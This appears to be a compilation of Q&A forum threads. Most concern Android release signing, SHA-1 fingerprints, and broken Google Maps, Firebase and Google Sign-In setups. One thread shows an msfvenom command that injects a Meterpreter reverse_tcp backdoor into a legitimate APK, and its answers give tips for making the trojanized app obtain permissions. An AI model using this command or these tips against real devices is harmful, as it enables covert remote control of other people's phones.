Google Maps v2 show blank screen when export project (apk) - google-maps-android-api-2

When I install my proyect using usb, the map works fine but when I want export my proyect (.apk) and install the app, the map doesn't work just show blank display. Any advice.
UPDATE: I have my proyect and google play services library in my dropbox and the debug.keystore in the root c:\Users\\debug.keystore
I have tried to do this but without success: Google Maps API V2 blank map after installation on real device

You have to update your SHA key in google console project.
You just replace exported SHA with old SHA key.
Exported SHA get like.
1) Export your project with create key store at that time you get exported SHA .

That was the solution, I needed the release key. Here is how to do that. Displaying the release certificate fingerprint

After implementing maps layout activity and manifest and other required files , the app should be build with the keystore provided in android sdk itself instead of our own keystore. keystore path - C/user/{username}/.android/debug.keystore with alias as "androiddebugkey" and password as "android"


Implementing google login flutter gives 12500 error

I implemented google login in flutter without using firebase in flutter (google cloud console). It was working in apk then later I needed push notification service for which I used firebase (fcm token and all) then I released the app to playstore but google login does not work. I keep getting apiexception error. Has anybody faced this issue? if yes any help would be highly appreciated.
I do not have a specific answer to your problem but I have also faced this problem once, I accidentally resolved it though.
But Error 12500 is a general error code that may occur when attempting to use the Google Sign-In feature and is caused by a few potensial issues:
An issue with the SHA-1 fingerprint of your app's signing
certificate: To use Google Sign-In, you need to configure your app's
SHA-1 fingerprint and package name in the Firebase console. Make
sure that the fingerprint and package name you have configured in
the Firebase console match the ones you are using to sign your app.
An issue with the Google Services configuration file: Make sure you
have properly added the Google Services configuration file to your
An issue with the Google Play Services library: Make sure you have
the latest version of the Google Play Services library installed in
your app.
An issue with the device or emulator you are using: Make sure you
are testing on a device or emulator that has Google Play Services
installed and is up to date.
Possible fixes to try/check:
Double-check the SHA-1 fingerprint and package name: Make sure that
the SHA-1 fingerprint and package name you have configured in the
Firebase console match the ones you are using to sign your app.
Make sure you have added the Google Services configuration file: The
Google Services configuration file is required for your app to
communicate with Google services, including Google Sign-In. Make
sure you have properly added this file to your app.
Update the Google Play Services library: Make sure you have the
latest version of the Google Play Services library installed in your
app. You can check for updates by going to the "SDK Manager" in
Android Studio.
Test on a device or emulator with Google Play Services installed:
Make sure you are testing on a device or emulator that has Google
Play Services installed and is up to date.
I hope this helps! I will quickly search if I can find any other solution.

this app is not authorized to use firebase authentication. please verify that the correct package name and SHA-1 are configured in the firebase

this app is not authorized to use firebase authentication. please verify that the correct package name and SHA-1 are configured in the firebase console
i have try so much things to solve this but nothing went happen
check the same firebase project in google cloud and cross-verify SHA-1 keys in firebase to google cloud, if see any old SHA-1 keys delete them or if your SHA-1 key from Firebase is not in google cloud then add sha-1 from add credential option. if still same error then create a new firebase project and then try again.
First, get the SHA-1 and SHA-256 keys. Run the following commands in your project root terminal window (from vscode or Android studio) one by one
cd android
./gradlew signingReport
this will take few minutes then you'll be popped up with a screen similar to this.
Copy SHA-1 and SHA-256 keys and paste it in firebase project settings at
Scroll down to find your android app then click on Add fingerprint
Note: Make sure to add both the keys, else it may not work as desired.
Happy coding :)

Release version of application cannot make API Calls?

I have completed an application that works fine in development env, both on android emulator and android phone.
I created a keystore, added INTERNET_PERMISSION to my manifest and followed the guide to release pretty much perfectly.
However, when I download the release app from the play store (it is in internal testing), the login API (and presumably the other APIs) do not work and infinitely load.
What did I miss?
The IOS Application is working perfectly in Testflight.
Assuming that you are using firebase.
After deployment to playstore.
Go to Play Console → Open App → Setup (Left panel) → App Integrity
you should be able to see something like this.
add the SHA-1 and SHA-256 fingerprint to the firebase project in firebase console and it should work after that.
Open Firebase Console → Open Project → Project Settings → General, scroll to very last and add these certificates.
You need to get the new google-services.json from firebase, add it to your app, make new build and re-deploy to playstore with a new version for this to work.

payload injected app doesn't ask for any permissions

I'm trying to trying to inject an apk with msfvenom payload, and thus get a backdoor on my android device upon installing it. Why isn't it asking for permissions upon installation?
In the past I've been able to successfully create a standalone payload and get a backdoor tunnel to my device.
msfvenom -p android/meterpreter/reverse_tcp -x /Users/root/Downloads/newApp.apk LHOST=[IP] LPORT=[port] -o /Users/root/Desktop/android.apk
I expected the app to ask for all the permissions specified in manifest file, but it isn't asking for any during installation or at runtime.
I had the same problem, but I have found a fix for it.
create apk file injected with payload.
install it on your phone.
install APK Editor pro v1.9.7.
open the apk editor and search for the injected apk click on it and click on COMMON EDIT.
change Minimum SDK version to 10 and Target SDK Version to 17.
I have already checked it and it's working
You need to specify what permissions the Main.apk has in your device..did you check those?If it has not asked for permission chances are it has no permission.
I have found some problems in the payload generation, but I have also found a solution.
1.- Inject the payload in the original application.
2.- Install the apk file on an android device.
3.- Go to application settings and search for the infected application.
4.- Grant all permissions.
And that's it, this worked for me.

Uploading Application .apk to Google Play with different Eclipse

In the previous Eclipse that I used, my keyhash has been created and edited on developers.facebook. At the moment I am using a different Eclipse and have some doubts while creating new keystore and new apk.
My questions are
1-) Do I have to create new keyhash for my new Eclipse for developers.facebook?
(before it was required when I tried to login to application with facebook, but on my second eclipse I was not warned by the device)
2-) Will I lose my users on google play if my keystore package and apk names are different.
My keystore password is same. Thank you its so important for me.
android:versionCode has been increased